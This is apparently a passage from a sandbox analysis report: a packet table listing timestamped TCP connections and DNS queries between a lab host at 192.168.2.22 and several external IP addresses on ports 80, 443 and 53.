                    Jul 1, 2024 20:06:08.577673912 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.577680111 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.577687979 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.577714920 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.577723980 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.577734947 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.577744961 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.577774048 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.577780962 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.578536987 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.578596115 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.579766035 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.579773903 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.579808950 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.579833984 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.579849005 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.579857111 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.579873085 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.579905033 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.659945011 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.660021067 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.660151958 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.660192013 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.660192013 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.660212040 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.660216093 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.660248041 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.660429955 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.661911964 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.661952019 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.661978960 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.661987066 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.662003994 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.662018061 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.662039995 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.664011955 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.664043903 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.664068937 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.664074898 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.664088011 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.664105892 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.664130926 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.665009975 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.665049076 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.665069103 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.665074110 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.665086031 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.665103912 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.666122913 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.666161060 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.666182995 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.666204929 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.666219950 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.666239023 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.667129040 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.667166948 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.667188883 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.667201042 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.667216063 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.667234898 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.668088913 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.668124914 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.668148041 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.668160915 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.668174982 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.668184996 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.669915915 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.669953108 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.669982910 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.669995070 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.670017004 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.670038939 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.670038939 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.749944925 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.749988079 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.750123024 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.750138998 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.750176907 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.750271082 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.751250029 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.751288891 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.751316071 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.751322031 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.751337051 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.751353979 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.752716064 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.752763033 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.752772093 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.752783060 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.752794027 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.752815008 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.754462004 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.754501104 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.754524946 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.754537106 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.754547119 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.754565954 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.755373955 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.755415916 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.755435944 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.755441904 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.755459070 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.755472898 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.757116079 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.757152081 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.757177114 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.757183075 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.757200956 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.757216930 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.757859945 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.757894993 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.757917881 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.757924080 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.757940054 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.757956982 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.758857965 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.758893967 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.758922100 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.758928061 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.758939981 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.758958101 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.759903908 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.759969950 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.840922117 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.841099024 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.841131926 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.841268063 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.841784000 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.841829062 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.841854095 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.841867924 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.841881037 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.841893911 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.842426062 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.842483044 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.844449997 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.844491005 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.844515085 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.844528913 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.844540119 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.844543934 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.844558954 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.844568968 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.844583035 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.844599962 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.844604969 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.844615936 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.844644070 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.844661951 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.844721079 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.845051050 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.845062971 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:13.873768091 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:13.878686905 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:13.878748894 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:13.880681992 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:13.885461092 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:14.596788883 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:14.681226969 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:14.686264038 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:14.855660915 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:15.079313993 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:15.079417944 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:15.535375118 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:15.535418034 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:15.535469055 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:15.542301893 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:15.542318106 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.055082083 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.055145979 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.061781883 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.061803102 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.062031984 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.154687881 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.196506977 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.269197941 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.269282103 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.269325018 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.273058891 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.297147036 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:16.302172899 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:16.461544037 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:16.466016054 CEST49166443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.466063976 CEST44349166188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.466114998 CEST49166443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.466583014 CEST49166443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.466600895 CEST44349166188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.671710968 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:16.942408085 CEST44349166188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.945674896 CEST49166443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.945694923 CEST44349166188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:17.082071066 CEST44349166188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:17.082164049 CEST44349166188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:17.082331896 CEST49166443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:17.082876921 CEST49166443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:17.110625029 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:17.119811058 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:17.121220112 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:17.259850025 CEST4916780192.168.2.22193.122.6.168
                    Jul 1, 2024 20:06:17.266534090 CEST8049167193.122.6.168192.168.2.22
                    Jul 1, 2024 20:06:17.267429113 CEST4916780192.168.2.22193.122.6.168
                    Jul 1, 2024 20:06:17.267494917 CEST4916780192.168.2.22193.122.6.168
                    Jul 1, 2024 20:06:17.275788069 CEST8049167193.122.6.168192.168.2.22
                    Jul 1, 2024 20:06:17.935688019 CEST8049167193.122.6.168192.168.2.22
                    Jul 1, 2024 20:06:18.008891106 CEST49168443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:18.008941889 CEST44349168188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:18.009006977 CEST49168443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:18.019491911 CEST49168443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:18.019506931 CEST44349168188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:18.147530079 CEST8049167193.122.6.168192.168.2.22
                    Jul 1, 2024 20:06:18.147592068 CEST4916780192.168.2.22193.122.6.168
                    Jul 1, 2024 20:06:18.496911049 CEST44349168188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:18.499934912 CEST49168443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:18.499963045 CEST44349168188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:18.647788048 CEST44349168188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:18.647866011 CEST44349168188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:18.647916079 CEST49168443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:18.648660898 CEST49168443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:18.663167000 CEST4916780192.168.2.22193.122.6.168
                    Jul 1, 2024 20:06:18.669704914 CEST8049167193.122.6.168192.168.2.22
                    Jul 1, 2024 20:06:18.669768095 CEST4916780192.168.2.22193.122.6.168
                    Jul 1, 2024 20:06:18.692095995 CEST4916980192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:18.697799921 CEST8049169193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:18.697880983 CEST4916980192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:18.697963953 CEST4916980192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:18.704257965 CEST8049169193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:19.171230078 CEST8049169193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:19.200259924 CEST49170443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:19.200311899 CEST44349170188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:19.200362921 CEST49170443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:19.200817108 CEST49170443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:19.200833082 CEST44349170188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:19.370568991 CEST4916980192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:19.669378042 CEST44349170188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:19.672338009 CEST49170443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:19.672362089 CEST44349170188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:19.815336943 CEST44349170188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:19.815418959 CEST44349170188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:19.815762997 CEST49170443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:19.816167116 CEST49170443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:19.852691889 CEST4917180192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:19.857667923 CEST8049171158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:19.857837915 CEST4917180192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:19.857837915 CEST4917180192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:19.863063097 CEST8049171158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:21.475548983 CEST8049171158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:21.494718075 CEST49172443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:21.494752884 CEST44349172188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:21.494820118 CEST49172443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:21.495157957 CEST49172443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:21.495171070 CEST44349172188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:21.679397106 CEST4917180192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:21.962382078 CEST44349172188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:21.966178894 CEST49172443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:21.966198921 CEST44349172188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:22.097337961 CEST44349172188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:22.097443104 CEST44349172188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:22.097599030 CEST49172443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:22.098500967 CEST49172443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:22.117233992 CEST4917180192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:22.124691963 CEST8049171158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:22.124756098 CEST4917180192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:22.141630888 CEST4917380192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:22.146589994 CEST8049173158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:22.146671057 CEST4917380192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:22.146749020 CEST4917380192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:22.152816057 CEST8049173158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:22.730767965 CEST8049173158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:22.757034063 CEST49174443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:22.757071018 CEST44349174188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:22.757139921 CEST49174443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:22.757574081 CEST49174443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:22.757586956 CEST44349174188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:22.942930937 CEST4917380192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:22.948739052 CEST8049173158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:22.948790073 CEST4917380192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:23.252070904 CEST44349174188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:23.279973030 CEST49174443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:23.279999971 CEST44349174188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:23.405853033 CEST44349174188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:23.405946970 CEST44349174188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:23.405996084 CEST49174443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:23.406924963 CEST49174443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:23.433624029 CEST4917380192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:23.444365025 CEST8049173158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:23.444420099 CEST4917380192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:23.462347984 CEST4917580192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:23.467181921 CEST8049175193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:23.467235088 CEST4917580192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:23.467356920 CEST4917580192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:23.475538969 CEST8049175193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:23.963009119 CEST8049175193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:23.990829945 CEST49176443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:23.990875959 CEST44349176188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:23.991050959 CEST49176443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:23.991795063 CEST49176443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:23.991808891 CEST44349176188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:24.175354004 CEST4917580192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:24.175595045 CEST8049175193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:24.175776005 CEST4917580192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:24.465935946 CEST44349176188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:24.470196009 CEST49176443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:24.470205069 CEST44349176188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:24.621733904 CEST44349176188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:24.621850967 CEST44349176188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:24.621937990 CEST49176443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:24.622740984 CEST49176443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:24.647885084 CEST4917580192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:24.658638000 CEST8049175193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:24.661089897 CEST4917580192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:24.673594952 CEST4917780192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:24.678556919 CEST8049177193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:24.681226969 CEST4917780192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:24.681402922 CEST4917780192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:24.686417103 CEST8049177193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:25.161417961 CEST8049177193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:25.180502892 CEST49178443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:25.180551052 CEST44349178188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:25.180607080 CEST49178443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:25.181060076 CEST49178443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:25.181072950 CEST44349178188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:25.375566006 CEST8049177193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:25.375813961 CEST4917780192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:25.664083004 CEST44349178188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:25.667366982 CEST49178443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:25.667407036 CEST44349178188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:25.818545103 CEST44349178188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:25.818624973 CEST44349178188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:25.818906069 CEST49178443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:25.820630074 CEST49178443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:07:24.182925940 CEST8049169193.122.130.0192.168.2.22
                    Jul 1, 2024 20:07:24.183049917 CEST4916980192.168.2.22193.122.130.0
                    Jul 1, 2024 20:07:30.159924984 CEST8049177193.122.130.0192.168.2.22
                    Jul 1, 2024 20:07:30.159982920 CEST4917780192.168.2.22193.122.130.0
                    Jul 1, 2024 20:08:05.185764074 CEST4917780192.168.2.22193.122.130.0
                    Jul 1, 2024 20:08:05.190711021 CEST8049177193.122.130.0192.168.2.22

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 1, 2024 20:06:07.536602974 CEST5456253192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:07.550009966 CEST53545628.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:13.596666098 CEST5291753192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:13.605909109 CEST53529178.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:13.833112001 CEST6275153192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:13.839656115 CEST53627518.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:15.521397114 CEST5789353192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:15.534264088 CEST53578938.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:17.129812956 CEST5482153192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:17.151537895 CEST53548218.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:17.232973099 CEST5471953192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:17.241972923 CEST53547198.8.8.8192.168.2.22
